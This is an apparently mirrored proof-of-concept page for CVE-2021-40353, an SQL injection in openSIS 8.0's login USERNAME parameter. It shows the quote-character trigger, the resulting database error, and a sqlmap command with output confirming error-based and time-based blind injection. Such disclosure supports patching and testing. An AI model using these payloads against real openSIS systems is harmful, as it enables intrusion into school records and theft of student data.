Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2021-40353 PoC — Open Solutions For Education openSIS SQL注入漏洞

Source
https://github.com/5qu1n7/CVE-2021-40353
Associated Vulnerability
Title:Open Solutions For Education openSIS SQL注入漏洞 (CVE-2021-40353)
Description:A SQL injection vulnerability exists in version 8.0 of openSIS when MySQL or MariaDB is used as the application database. An attacker can then issue the SQL command through the index.php USERNAME parameter. NOTE: this issue may exist because of an incomplete fix for CVE-2020-6637.
Description
CVE-2021-40353 openSIS 8.0 SQL Injection Vulnerability
Readme
# CVE-2021-40353
CVE-2021-40353 openSIS 8.0 SQL Injection Vulnerability https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40353

A SQL injection vulnerability exists in version 8.0 of openSIS when MySQL or MariaDB  is used as the application database. An attacker can
then issue the SQL command through the USERNAME parameter.


Vulnerable PHP Page:

index.php - USERNAME parameter

Vulnerable Payload
' - will produce an error with database information
" - does not produce the error

Error

Date: 	

08/31/2021 03:16:22

Failure Notice: 	

 DB Execute Failed 

SQL: 	UPDATE login_authentication SET FAILED_LOGIN=FAILED_LOGIN+1 WHERE UPPER(USERNAME)=UPPER('user1'')
Traceback: 	C:\xampp\htdocs\opensis\index.php at 502
Additional Information: 	You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''user1'')' at line 1
Date: 	

08/31/2021 03:16:22

	openSIS has encountered an error that could have resulted from any of the following:

    Invalid data input
    Database SQL error
    Program error

Please take this screen shot and send it to your openSIS representative for debugging and resolution. 




sqlmap -r post_opensis -p USERNAME

[09:38:19] [INFO] POST parameter 'USERNAME' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable 
[09:38:19] [INFO] testing 'MySQL inline queries'
[09:38:20] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[09:38:21] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[09:38:22] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[09:38:22] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[09:38:23] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[09:38:23] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[09:38:24] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[09:38:46] [INFO] POST parameter 'USERNAME' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable




Discovered by Brian Lowe, August 2021
File Snapshot

 [4.0K]  /data/pocs/696cb287b634c6e9bea2aea00b187f7cf84d9b86
└── [2.1K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →